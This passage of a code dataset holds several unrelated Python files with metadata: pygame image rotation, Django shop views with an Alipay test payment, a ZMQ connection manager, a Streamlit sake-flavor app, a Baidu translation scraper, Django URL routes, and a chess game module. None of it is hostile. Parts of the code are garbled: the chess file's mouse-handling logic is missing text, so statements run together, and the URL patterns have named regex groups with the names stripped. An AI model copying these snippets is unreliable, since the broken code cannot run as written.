bval)\n\ndef main():\n \"\"\" main routine \"\"\"\n src = pygame.image.load(\"picture0.jpg\").convert()\n dst = pygame.Surface((250, 250))\n src_data = pygame.PixelArray(src)\n dst_data = pygame.PixelArray(dst)\n process_pixels(src_data, dst_data)\n del src_data\n del dst_data\n\n while True:\n for _ in pygame.event.get(QUIT):\n pygame.quit()\n sys.exit()\n SURFACE.blit(dst, (0, 0))\n pygame.display.update()\n FPSCLOCK.tick(5)\n\nif __name__ == '__main__':\n main()\n", "sub_path": "PythonMathSamples/pixels/pixel_array11_rotate.py", "file_name": "pixel_array11_rotate.py", "file_ext": "py", "file_size_in_byte": 1335, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "pygame.init", "line_number": 7, "usage_type": "call"}, {"api_name": "pygame.display.set_mode", "line_number": 8, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 8, "usage_type": "attribute"}, {"api_name": "pygame.time.Clock", "line_number": 9, "usage_type": "call"}, {"api_name": "pygame.time", "line_number": 9, "usage_type": "attribute"}, {"api_name": "math.radians", "line_number": 13, "usage_type": "call"}, {"api_name": "math.sin", "line_number": 14, "usage_type": "call"}, {"api_name": "math.cos", "line_number": 14, "usage_type": "call"}, {"api_name": "math.floor", "line_number": 20, "usage_type": "call"}, {"api_name": "math.floor", "line_number": 21, "usage_type": "call"}, {"api_name": "pygame.image.load", "line_number": 30, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 30, "usage_type": "attribute"}, {"api_name": "pygame.Surface", "line_number": 31, "usage_type": "call"}, {"api_name": "pygame.PixelArray", "line_number": 32, "usage_type": "call"}, {"api_name": "pygame.PixelArray", "line_number": 33, "usage_type": "call"}, {"api_name": "pygame.event.get", "line_number": 39, "usage_type": "call"}, {"api_name": "pygame.locals.QUIT", "line_number": 39, "usage_type": "argument"}, {"api_name": "pygame.event", "line_number": 39, "usage_type": "attribute"}, {"api_name": "pygame.quit", "line_number": 40, 
"usage_type": "call"}, {"api_name": "sys.exit", "line_number": 41, "usage_type": "call"}, {"api_name": "pygame.display.update", "line_number": 43, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 43, "usage_type": "attribute"}]} +{"seq_id": "209675853", "text": "import datetime\nimport random\n\nfrom django.db import transaction\nfrom django.db.models import F\nfrom django.shortcuts import render, redirect\nfrom django.http import HttpResponseRedirect, HttpResponse, JsonResponse\n# from django_redis.serializers import json\n\nfrom OrangeMall.utils import check_user_login\nimport json\n\nfrom apps.account.models import ShopCar, Order\nfrom apps.home.models import Goods\n\n@check_user_login\ndef submit_cart(request):\n result = {'status': 200, 'msg': 'ok'}\n if request.method == 'POST':\n # 1,如果用户点击结算,获取商品的数量,和购物车表的car_id 先更新数据库\n cars_str = request.POST.get('car')\n cars = json.loads(cars_str)\n for car in cars:\n num = car.get(\"num\")\n car_id = car.get('car_id')\n car = ShopCar.objects.filter(car_id=car_id)\n try:\n if car:\n car.update(count=num)\n except Exception as e:\n print(f'更新购物车数据库出错{e}')\n return JsonResponse(result)\n else:\n # 2,根据car_id查询,新的数据, 图片, 数量, 原价, 现价, 总金额,\n user = request.session.get(\"muser\", None)\n if user:\n car_list = ShopCar.objects.filter(member_id=user.member_id)\n for car in car_list:\n # car.goods_id.img =car.goods_id.goodsdetail_set.filter(goods_id=car.goods_id).values_list('image',flat=True).first()\n car.goods_id.img = Goods.objects.filter(goods_id=car.goods_id.goods_id).first().goodsdetail.image\n car.goods_id.origin_price = car.goods_id.goodsspu_set.filter(goods_id=car.goods_id).values_list(\n 'origin_price', flat=True).first()\n car.goods_id.goods_price = car.goods_id.goodsspu_set.filter(goods_id=car.goods_id).values_list(\n 'goods_price', flat=True).first()\n car.goods_id.allprice = int(car.count) * int(car.goods_id.goods_price)\n print(car.goods_id.img)\n print(car.goods_id.origin_price)\n print(car.goods_id.goods_price)\n print(car.goods_id.allprice)\n print('结算页面展示')\n return render(request, 'cart/pay.html', context={'car_list': car_list})\n # return render(request,'cart/pay.html')\n\ndef submit_order(request):\n\n return render(request,'cart/pay.html')\n\n\n# 生成订单信息\ndef product_order(request, cars):\n # 第一步生成订单号 全站必须唯一 尽量大于8位\n member_id = request.session.get(\"muser\",None).member_id\n order_code = f\"{datetime.datetime.now().strftime('%Y%m%d%H%M%S')}{random.randint(100000,999999)}\"\n order = Order(order_id=order_code, member_id=member_id)\n order.save()\n return order.order_id\n\n\ndef pay_success(request):\n return render(request, 'cart/success.html')\n\n\nfrom alipay import AliPay\nfrom OrangeMall import settings\ndef pay(request):\n\n # 1,点击立即购买, 发起ajax请求,到此视图函数---> 将商品数量,商品id,用户id ,生成订单号 存入到 订单表\n # 2,连表查询获取商品的单价,数量并根据 总价, 订单号,发去收款\n alipay = AliPay(\n appid=settings.AAP_ID,\n app_notify_url=None,\n app_private_key_string=settings.APP_PRIVATE_STRING,\n alipay_public_key_string= settings.APP_PUBLIC_STRING,\n # 坑点1\n sign_type=\"RSA2\",\n debug= True\n )\n order_string = alipay.api_alipay_trade_page_pay(\n # 订单号 每次付款时保证订单号唯一 否则会出现 : 订单信息有错误,建议重新下单后付款。 错误码:CONTEXT_INCONSISTENT\n out_trade_no='123451',\n # 商品总价\n total_amount='0.01', # 将Decimal类型转换为字符串交给支付宝\n # 订单标题\n subject=\"悦桔商城-{}\".format(9527),\n # 支付成功之后 前端跳转的界面\n return_url='https://baidu.com/',\n # 支付成功后台跳转接口\n notify_url=None # 可选, 不填则使用默认notify url\n )\n # 让用户进行支付的支付宝页面网址\n url = settings.ALI_PAY_URL + \"?\" + order_string\n # 坑点2 路由设置不要设置为主页\n return 
redirect(url)\n\n\n\n# 点击立即购买---> 将商品数量,商品id,用户id ,生成订单号 存入到 订单表---->", "sub_path": "apps/order/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 4388, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "json.loads", "line_number": 22, "usage_type": "call"}, {"api_name": "apps.account.models.ShopCar.objects.filter", "line_number": 26, "usage_type": "call"}, {"api_name": "apps.account.models.ShopCar.objects", "line_number": 26, "usage_type": "attribute"}, {"api_name": "apps.account.models.ShopCar", "line_number": 26, "usage_type": "name"}, {"api_name": "django.http.JsonResponse", "line_number": 32, "usage_type": "call"}, {"api_name": "apps.account.models.ShopCar.objects.filter", "line_number": 37, "usage_type": "call"}, {"api_name": "apps.account.models.ShopCar.objects", "line_number": 37, "usage_type": "attribute"}, {"api_name": "apps.account.models.ShopCar", "line_number": 37, "usage_type": "name"}, {"api_name": "apps.home.models.Goods.objects.filter", "line_number": 40, "usage_type": "call"}, {"api_name": "apps.home.models.Goods.objects", "line_number": 40, "usage_type": "attribute"}, {"api_name": "apps.home.models.Goods", "line_number": 40, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 51, "usage_type": "call"}, {"api_name": "OrangeMall.utils.check_user_login", "line_number": 16, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 56, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 63, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 63, "usage_type": "attribute"}, {"api_name": "random.randint", "line_number": 63, "usage_type": "call"}, {"api_name": "apps.account.models.Order", "line_number": 64, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 70, "usage_type": "call"}, {"api_name": "alipay.AliPay", "line_number": 79, "usage_type": "call"}, {"api_name": "OrangeMall.settings.AAP_ID", "line_number": 80, "usage_type": "attribute"}, {"api_name": "OrangeMall.settings", "line_number": 80, "usage_type": "name"}, {"api_name": "OrangeMall.settings.APP_PRIVATE_STRING", "line_number": 82, "usage_type": "attribute"}, {"api_name": "OrangeMall.settings", "line_number": 82, "usage_type": "name"}, {"api_name": "OrangeMall.settings.APP_PUBLIC_STRING", "line_number": 83, "usage_type": "attribute"}, {"api_name": "OrangeMall.settings", "line_number": 83, "usage_type": "name"}, {"api_name": "alipay.api_alipay_trade_page_pay", "line_number": 88, "usage_type": "call"}, {"api_name": "OrangeMall.settings.ALI_PAY_URL", "line_number": 101, "usage_type": "attribute"}, {"api_name": "OrangeMall.settings", "line_number": 101, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 103, "usage_type": "call"}]} +{"seq_id": "321085723", "text": "#!/usr/bin/env python2.7\n# encoding: utf-8\n# Copyright (c) 2016 Dilusense Inc. 
All Rights Reserved.\nimport logging\nfrom msg_trans import ZMQPort\nfrom msg_trans.thread_subs_msg import SubsMsgServer\nfrom services.msg_center.zmq_msg_connections import ZMQConns\nfrom utils.global_info import GlobalInfo\nfrom utils.my_constant import MyConstant\nfrom utils.regular_expression import Regular\nfrom utils.serialize_utils import SerializeUtils\n\n\nclass PortalMsgManager(object):\n\n    @staticmethod\n    def add_new_conn(ip):\n        if Regular.verify_ip(ip):\n            sms = SubsMsgServer(ip, ZMQPort.SUBS)\n            sms.start()\n            if sms.isAlive():\n                ZMQConns().put(ip, sms)\n        else:\n            logging.getLogger(GlobalInfo.logger_main).info('ip: ' + ip + ' is unlawful can not connect to server')\n\n\n    @staticmethod\n    def init_portals():\n        ips = SerializeUtils.get(MyConstant.portal_ips_serialize_data_key)\n        if ips is None:\n            logging.getLogger(GlobalInfo.logger_main).info('no ip to init zmq conn')\n            return\n        ips = set(ips)\n        for ip in ips:\n            PortalMsgManager.add_new_conn(ip)\n\n\n    @staticmethod\n    def update_portals(ips):\n        smss = ZMQConns().get_all()\n        sms_keys = ([])\n        ip_keys = ([])\n\n        if type(ips) == dict:\n            ip_keys_store = {}\n        elif type(ips) == list:\n            ip_keys_store = []\n        else:\n            raise NameError('parameter of this method must be dict or list')\n\n        try:\n            ip_keys = set(ips)\n        except:\n            pass\n        try:\n            sms_keys = set(smss)\n        except:\n            pass\n\n        new_ips = ip_keys - sms_keys\n        old_ips = sms_keys - ip_keys\n        intersection_ips = ip_keys & sms_keys\n\n        for ip_key in ip_keys:\n            if type(ips) == dict:\n                ip_keys_store[ip_key] = ips[ip_key]\n            else:\n                ip_keys_store.append(ip_key)\n\n\n        for ip in intersection_ips:\n            logging.getLogger(GlobalInfo.logger_main).info('portal of ip: ' + ip + ' msg passageway is already exits')\n\n        for ip in old_ips:\n            if ZMQConns().get(ip) is not None:\n                ZMQConns().get(ip).run_flag = False\n            ZMQConns().remove(ip)\n\n        for ip in new_ips:\n            PortalMsgManager.add_new_conn(ip)\n\n        SerializeUtils.update(MyConstant.portal_ips_serialize_data_key, ip_keys_store)\n\n", "sub_path": "backend/src/app/services/msg_center/portal_msg_manager.py", "file_name": "portal_msg_manager.py", "file_ext": "py", "file_size_in_byte": 2451, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "utils.regular_expression.Regular.verify_ip", "line_number": 18, "usage_type": "call"}, {"api_name": "utils.regular_expression.Regular", "line_number": 18, "usage_type": "name"}, {"api_name": "msg_trans.thread_subs_msg.SubsMsgServer", "line_number": 19, "usage_type": "call"}, {"api_name": "msg_trans.ZMQPort.SUBS", "line_number": 19, "usage_type": "attribute"}, {"api_name": "msg_trans.ZMQPort", "line_number": 19, "usage_type": "name"}, {"api_name": "services.msg_center.zmq_msg_connections.ZMQConns", "line_number": 22, "usage_type": "call"}, {"api_name": "logging.getLogger", "line_number": 24, "usage_type": "call"}, {"api_name": "utils.global_info.GlobalInfo.logger_main", "line_number": 24, "usage_type": "attribute"}, {"api_name": "utils.global_info.GlobalInfo", "line_number": 24, "usage_type": "name"}, {"api_name": "utils.serialize_utils.SerializeUtils.get", "line_number": 29, "usage_type": "call"}, {"api_name": "utils.serialize_utils.SerializeUtils", "line_number": 29, "usage_type": "name"}, {"api_name": "utils.my_constant.MyConstant.portal_ips_serialize_data_key", "line_number": 29, "usage_type": "attribute"}, {"api_name": "utils.my_constant.MyConstant", "line_number": 29, "usage_type": "name"}, {"api_name": "logging.getLogger", "line_number": 31, "usage_type": "call"}, {"api_name": "utils.global_info.GlobalInfo.logger_main", "line_number": 31, "usage_type": "attribute"}, {"api_name": "utils.global_info.GlobalInfo", "line_number": 31, "usage_type": "name"}, {"api_name": "services.msg_center.zmq_msg_connections.ZMQConns", "line_number": 40, "usage_type": "call"}, {"api_name": "logging.getLogger", "line_number": 72, "usage_type": "call"}, {"api_name": "utils.global_info.GlobalInfo.logger_main", "line_number": 72, "usage_type": "attribute"}, {"api_name": "utils.global_info.GlobalInfo", "line_number": 72, "usage_type": "name"}, {"api_name": "services.msg_center.zmq_msg_connections.ZMQConns", "line_number": 75, "usage_type": "call"}, {"api_name": "services.msg_center.zmq_msg_connections.ZMQConns", "line_number": 76, "usage_type": "call"}, {"api_name": "services.msg_center.zmq_msg_connections.ZMQConns", "line_number": 77, "usage_type": "call"}, {"api_name": "utils.serialize_utils.SerializeUtils.update", "line_number": 82, "usage_type": "call"}, {"api_name": "utils.serialize_utils.SerializeUtils", "line_number": 82, "usage_type": "name"}, {"api_name": "utils.my_constant.MyConstant.portal_ips_serialize_data_key", "line_number": 82, "usage_type": "attribute"}, {"api_name": "utils.my_constant.MyConstant", "line_number": 82, "usage_type": "name"}]}
+{"seq_id": "578693453", "text": "import pandas as pd\n# import numpy as np\nimport requests\nimport json\nimport streamlit as st\nimport plotly.express as px\n\n\n# Markdown can be used for the page text\nst.markdown('# Simple Sake App')\nst.markdown('Displaying data from the [Sakenowa API](https://sakenowa.com):')\n\n# API endpoints\nurls = {\n    \"地域一覧\": \"https://muro.sakenowa.com/sakenowa-data/api/areas\",\n    \"銘柄一覧\": \"https://muro.sakenowa.com/sakenowa-data/api/brands\",\n    \"蔵元一覧\": \"https://muro.sakenowa.com/sakenowa-data/api/breweries\",\n    \"ランキング\": \"https://muro.sakenowa.com/sakenowa-data/api/rankings\",\n    \"フレーバーチャート\": \"https://muro.sakenowa.com/sakenowa-data/api/flavor-charts\",\n    \"フレーバータグ\": \"https://muro.sakenowa.com/sakenowa-data/api/flavor-tags\",\n    \"銘柄ごとフレーバータグ\": \"https://muro.sakenowa.com/sakenowa-data/api/brand-flavor-tags\",\n    }\n\n    # Get the area names\nareas_response = requests.get(urls.get(\"地域一覧\")).json()\nareas = [area[\"name\"] for area in areas_response[\"areas\"]]\nselect_areas = st.sidebar.selectbox(\"Choose your favorite region\", areas)\n\n# Get the area ID\nareaId = [area[\"id\"] for area in areas_response[\"areas\"] if area[\"name\"]==select_areas][0]\n\n# Get the brewery names\nbreweries_response = requests.get(urls.get(\"蔵元一覧\")).json()\nbreweries = [breweries[\"name\"] for breweries in breweries_response[\"breweries\"] if breweries[\"areaId\"]==areaId]\nselect_breweries = st.sidebar.selectbox(\"Choose your favorite brewery\", breweries)\n\n# Get the brewery ID\nbreweryId = [breweries[\"id\"] for breweries in breweries_response[\"breweries\"] if breweries[\"name\"]==select_breweries][0]\n\n# Get the brand names\nbrands_response = requests.get(urls.get(\"銘柄一覧\")).json()\nbrands = [brands[\"name\"] for brands in brands_response[\"brands\"] if brands[\"breweryId\"]==breweryId]\nselect_brands = st.sidebar.selectbox(\"Choose your favorite brand\", brands)\n\n# Get the brand ID\nbrandId = [brands[\"id\"] for brands in brands_response[\"brands\"] if brands[\"name\"]==select_brands][0]\n\n# Get the flavor chart\nflavor_charts_response = requests.get(urls.get(\"フレーバーチャート\")).json()\nflavor_charts = [flavor_charts for flavor_charts in flavor_charts_response[\"flavorCharts\"] if flavor_charts[\"brandId\"]==brandId]\n\n# Display a radar chart with plotly\nst.markdown(f'## Flavor chart for {select_brands}')\n\ntry:\n    df = pd.DataFrame(flavor_charts)\n    df = df.drop('brandId', axis=1)\n    # Rename the columns for readability, then transpose the data so plotly can read it\n    df = df.rename(columns={'f1':'華やか', 'f2':'芳醇', 'f3':'重厚', 'f4':'穏やか', 'f5':'ドライ', 'f6':'軽快'}).T\n    fig = px.line_polar(df, r=df[0], theta=df.index, line_close=True, range_r=[0,1])\n    st.plotly_chart(fig)\n    \n# Some brands have no flavor chart data, so handle that case\nexcept:\n    st.markdown('## No flavor chart is available for this brand!!')\n\n", "sub_path": "sake.py", "file_name": "sake.py", "file_ext": "py", "file_size_in_byte": 3093, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "streamlit.markdown", "line_number": 10, "usage_type": "call"}, {"api_name": "streamlit.markdown", "line_number": 11, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 25, "usage_type": "call"}, {"api_name": "streamlit.sidebar.selectbox", "line_number": 27, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 27, "usage_type": "attribute"}, {"api_name": "requests.get", "line_number": 33, "usage_type": "call"}, {"api_name": "streamlit.sidebar.selectbox", "line_number": 35, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 35, "usage_type": "attribute"}, {"api_name": "requests.get", "line_number": 41, "usage_type": "call"}, {"api_name": "streamlit.sidebar.selectbox", "line_number": 43, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 43, "usage_type": "attribute"}, {"api_name": "requests.get", "line_number": 49, "usage_type": "call"}, {"api_name": "streamlit.markdown", "line_number": 53, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 56, "usage_type": "call"}, {"api_name": "plotly.express.line_polar", "line_number": 60, "usage_type": "call"}, {"api_name": "plotly.express", "line_number": 60, "usage_type": "name"}, {"api_name": "streamlit.plotly_chart", "line_number": 61, "usage_type": "call"}, {"api_name": "streamlit.markdown", "line_number": 65, "usage_type": "call"}]}
+{"seq_id": "172257022", "text": "import requests\nimport json\n\n\nclass BaiduTrans:\n    def __init__(self, trans_str):\n        self.trans_str = trans_str\n        self.lang_detect_url = \"https://fanyi.baidu.com/langdetect\"\n        self.headers = {\"User-Agent\": \"Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Mobile Safari/537.36\"}\n        self.trans_url = \"https://fanyi.baidu.com/basetrans\"\n\n    def parse_url(self, url, data):\n        res = requests.post(url, data=data, headers=self.headers)\n        return json.loads(res.content.decode())\n\n    def get_res(self, dict_res):\n        res = dict_res[\"trans\"][0][\"dst\"]\n        print(\"Result:\", res)\n\n    def run(self):\n        lang_detect_data = {\"query\": self.trans_str}\n        # Detect the language type\n        lang = self.parse_url(self.lang_detect_url, lang_detect_data)[\"lan\"]\n        # Prepare the POST data\n        trans_data = {\"query\": self.trans_str, \"from\":\"zh\", \"to\":\"en\"} if lang==\"zh\" else {\"query\": self.trans_str, \"from\":\"en\", \"to\":\"zh\"}\n        dict_res = self.parse_url(self.trans_url, trans_data)\n        self.get_res(dict_res)\n\n\ndef main():\n    my_str = input(\"Input: \")\n    bf = BaiduTrans(my_str)\n    bf.run()\n\n\nif __name__ == '__main__':\n    main()\n", "sub_path": "spider/baidu_fanyi.py", "file_name": "baidu_fanyi.py", "file_ext": "py", "file_size_in_byte": 1249, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "requests.post", "line_number": 13, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 14, "usage_type": "call"}]} 
+{"seq_id": "1478513", "text": "from os import name\nfrom django.conf import settings\nfrom django.urls import path,re_path\nfrom . import views\nfrom django.conf.urls.static import static\n\nurlpatterns = [\n path('',views.index,name='home'),\n path('upload/image/',views.upload_post,name='NewPost'),\n path('update/',views.update_profile,name='UpdateProfile'),\n re_path('like/(?P\\d+)',views.like_post,name='LikePost'),\n path('create_profile/',views.create_profile,name='create_profile'),\n re_path('comment/(?P\\d+)',views.comment,name='AddComment'),\n re_path('profile/(?P\\d+)',views.profile,name='profile'),\n path('search/',views.search,name='Search'),\n path('email/',views.welcome_mail,name='email'),\n re_path('single/(?P\\d+)',views.single_post,name='single-post')\n]\n\nif settings.DEBUG:\n urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)", "sub_path": "insta/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 878, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "django.urls.path", "line_number": 8, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 9, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 10, "usage_type": "call"}, {"api_name": "django.urls.re_path", "line_number": 11, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 12, "usage_type": "call"}, {"api_name": "django.urls.re_path", "line_number": 13, "usage_type": "call"}, {"api_name": "django.urls.re_path", "line_number": 14, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 15, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 16, "usage_type": "call"}, {"api_name": "django.urls.re_path", "line_number": 17, "usage_type": "call"}, {"api_name": "django.conf.settings.DEBUG", "line_number": 20, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 20, "usage_type": "name"}, {"api_name": "django.conf.urls.static.static", "line_number": 21, "usage_type": "call"}, {"api_name": "django.conf.settings.MEDIA_URL", "line_number": 21, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 21, "usage_type": "name"}, {"api_name": "django.conf.settings.MEDIA_ROOT", "line_number": 21, "usage_type": "attribute"}]} +{"seq_id": "95073183", "text": "import pygame \nimport sys\nimport copy\nfrom Board.board import Board\nfrom Board.tile import Tile\nfrom Pieces.NullPiece import NullPiece\nfrom image import Image\n\nimport bot\n\ndef check_events(screen,board):\n mx = 0\n my = 0\n for event in pygame.event.get():\n if event.type == pygame.QUIT :\n board.end_game = True\n # or event.key == pygame.K_ESCAPE :\n sys.exit()\n if event.type == pygame.MOUSEBUTTONDOWN and board.selectedStartTile.tileCoordinate == []:\n board.mx,board.my = pygame.mouse.get_pos()\n for i in range(8):\n for j in range(8):\n if board.gameTiles[i][j].pos[0]\")\n print(board.legalMoves)\n print(\"available moves : \",end=\"\")\n for key, value in board.default.items():\n for move in board.legalMoves:\n if(move == value):\n print(key,end = \" \")\n print(\"\\n\",end = \"\")\n elif (board.selectedStartTile.pieceOnTile.symbol != \" \" and \\\n board.selectedStartTile.pieceOnTile.alliance != board.turn) or\\\n board.selectedStartTile.pieceOnTile.symbol == \" \":\n board.selectedStartTile = Tile([],NullPiece([]))\n else :\n board.selectedStartTile = Tile([],NullPiece([]))\n updateScreen(screen,board)\n # 
pygame.display.flip()\n # print(\"vao day\")\n elif event.type == pygame.MOUSEBUTTONDOWN and board.selectedStartTile.tileCoordinate\\\n != [] :\n if len(board.legalMoves)>0:\n board.mx, board.my = pygame.mouse.get_pos()\n for i in range(8):\n for j in range(8):\n if board.gameTiles[i][j].pos[0]\"+str(move))\n board.whiteKing[0].check = True\n return True\n board.whiteKing[0].check = False \n return False\ndef blackKingCheck(board):\n kingPosition(board)\n\n for piece in board.pieces:\n if piece[0].symbol() != \"k\" and piece[0].alliance != -1:\n moves = piece[0].availableMoves(board)\n # print(\"test\")\n # print(moves)\n # print(piece[0].symbol())\n # if len(moves) != 0:\n for move in moves : \n if move == board.blackKing[1] :\n # print(\"test black king check\"+piece[0].symbol()+\"->\"+str(move))\n board.blackKing[0].check = True\n return True\n board.blackKing[0].check = False\n return False\ndef checkLegal(board):\n temp = Board()\n # print(\"legal move \")\n delete = []\n if board.turn == 1 :\n for move in board.legalMoves :\n temp = copy.deepcopy(board)\n for x,y in temp.default.items():\n if y == move :\n temp.updateMove(temp.start, x)\n # temp.printBoard()\n temp.updatePieceForCheck()\n if whiteKingCheck(temp) == True :\n delete.append(move)\n elif board.turn == -1 :\n for move in board.legalMoves :\n temp = copy.deepcopy(board)\n for x,y in temp.default.items():\n if y == move :\n temp.updateMove(temp.start, x)\n # temp.printBoard()\n temp.updatePieceForCheck()\n if blackKingCheck(temp) == True :\n delete.append(move)\n for move in delete:\n board.legalMoves.remove(move)\n # print(board.legalMoves)\ndef checkMate(board):\n temp = Board()\n count = 0\n if board.turn == 1 and whiteKingCheck(board) == True:\n for piece in board.pieces:\n if piece[0].alliance == 1:\n board.legalMoves = piece[0].availableMoves(board)\n for x, y in board.default.items():\n if y == piece[0].position:\n board.start = x\n checkLegal(board)\n count += len(board.legalMoves)\n for move in board.legalMoves:\n temp = copy.deepcopy(board)\n for x,y in temp.default.items():\n if y == move:\n temp.updateMove(temp.start,x)\n temp.updatePieceForCheck()\n if whiteKingCheck(temp) == True : \n print(\"Checkmate! Black wins the game\")\n return True\n else:\n return False \n if count == 0 :\n print(\"Checkmate! Black wins the game\")\n return True\n if board.turn == -1 and blackKingCheck(board) == True:\n for piece in board.pieces:\n if piece[0].alliance == -1:\n board.legalMoves = piece[0].availableMoves(board)\n for x, y in board.default.items():\n if y == piece[0].position:\n board.start = x\n checkLegal(board)\n count += len(board.legalMoves)\n for move in board.legalMoves:\n temp = copy.deepcopy(board)\n for x,y in temp.default.items():\n if y == move:\n temp.updateMove(temp.start,x)\n # temp.printBoard()\n temp.updatePieceForCheck()\n if blackKingCheck(temp) == True : \n print(\"Checkmate! White wins the game\")\n return True\n else:\n return False \n if count == 0 :\n print(\"Checkmate! White wins the game\")\n return True\ndef checkStalemate(board):\n temp = Board()\n count = 0\n if board.turn == 1 and whiteKingCheck(board) == False:\n for piece in board.pieces:\n if piece[0].alliance == 1:\n board.legalMoves = piece[0].availableMoves(board)\n checkLegal(board)\n count += len(board.legalMoves)\n if count != 0 :\n return False\n if count == 0 :\n print(\"Stalemate! 
White turn\")\n return True\n if board.turn == -1 and blackKingCheck(board) == False:\n for piece in board.pieces:\n if piece[0].alliance == -1:\n board.legalMoves = piece[0].availableMoves(board)\n checkLegal(board)\n count += len(board.legalMoves)\n if count != 0 :\n return False\n if count == 0 :\n print(\"Stalemate! Black turn\")\n return True\n#=============================UPDATE SCREEN==================================\ndef squares(screen,x,y,w,h,color):\n pygame.draw.rect(screen, color, [x,y,w,h])\n\ndef drawChess(screen,board):\n xpos = 0\n ypos = 0\n color = 0\n width = 60\n height = 60\n # black = (60,134,244)\n black = (128,128,128)\n # white = (143,155,175)\n white = (255,153,153)\n orange = (255,165,0)\n pieces = []\n for i in range(8):\n for j in range(8):\n board.gameTiles[i][j].pos.append(xpos)\n board.gameTiles[i][j].pos.append(ypos)\n if color % 2 == 0 :\n if board.selectedStartTile.tileCoordinate == [i,j] or ([i,j] in board.legalMoves == True):\n squares(screen,xpos,ypos,width,height,orange)\n else:\n squares(screen,xpos,ypos,width,height,white)\n if board.gameTiles[i][j].pieceOnTile.symbol() != \" \":\n pieces.append([board.gameTiles[i][j].pieceOnTile,[xpos,ypos]])\n xpos += 60\n else :\n if board.selectedStartTile.tileCoordinate == [i,j] or ([i,j] in board.legalMoves == True):\n squares(screen,xpos,ypos,width,height,orange)\n else:\n squares(screen,xpos,ypos,width,height,black)\n if board.gameTiles[i][j].pieceOnTile.symbol() != \" \":\n pieces.append([board.gameTiles[i][j].pieceOnTile,[xpos,ypos]])\n xpos += 60\n color += 1\n color += 1\n xpos = 0\n ypos += 60\n return pieces\n\ndef updateScreen(screen,board):\n board.pieces = drawChess(screen,board)\n temp = Image()\n array = []\n for piece in board.pieces:\n array.append([temp.getImage(piece[0].symbol()),piece[1]])\n for img in array:\n screen.blit(img[0],img[1])\n\n # for img in board.pieces:\n # screen.blit(img[0].image,img[1])\n\n\n#============================MOVE=============================================\ndef getAvailableMove(board,position):\n kingPosition(board)\n if board.gameTiles[position[0]][position[1]].pieceOnTile.symbol != \" \":\n moves = board.gameTiles[position[0]][position[1]].pieceOnTile.availableMoves(board)\n return moves\n else :\n print(\"Null Piece\")\n return\n\ndef getMove(board):\n print(\"GET PLAYER MOVE : \")\n print(\"start : \")\n start = input()\n if board.gameTiles[board.default[start][0]][board.default[start][1]].pieceOnTile.symbol() == \" \":\n print(\"Null Piece\")\n return 9,9\n moves = getAvailableMove(board,board.default[start])\n print(moves)\n print(\"available moves : \",end='')\n for move in moves : \n for key, value in board.default.items():\n if move == value:\n print(key,end =' ')\n print(\"\",end = '\\n')\n print(\"end : \")\n end = input()\n for move in moves : \n if board.default[end] == move and start != end:\n return start, end\n print(\"inValid Move\")\n return 9,9\n\n\n", "sub_path": "settings.py", "file_name": "settings.py", "file_ext": "py", "file_size_in_byte": 13776, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "pygame.event.get", "line_number": 14, "usage_type": "call"}, {"api_name": "pygame.event", "line_number": 14, "usage_type": "attribute"}, {"api_name": "pygame.QUIT", "line_number": 15, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 18, "usage_type": "call"}, {"api_name": "pygame.MOUSEBUTTONDOWN", "line_number": 19, "usage_type": "attribute"}, 
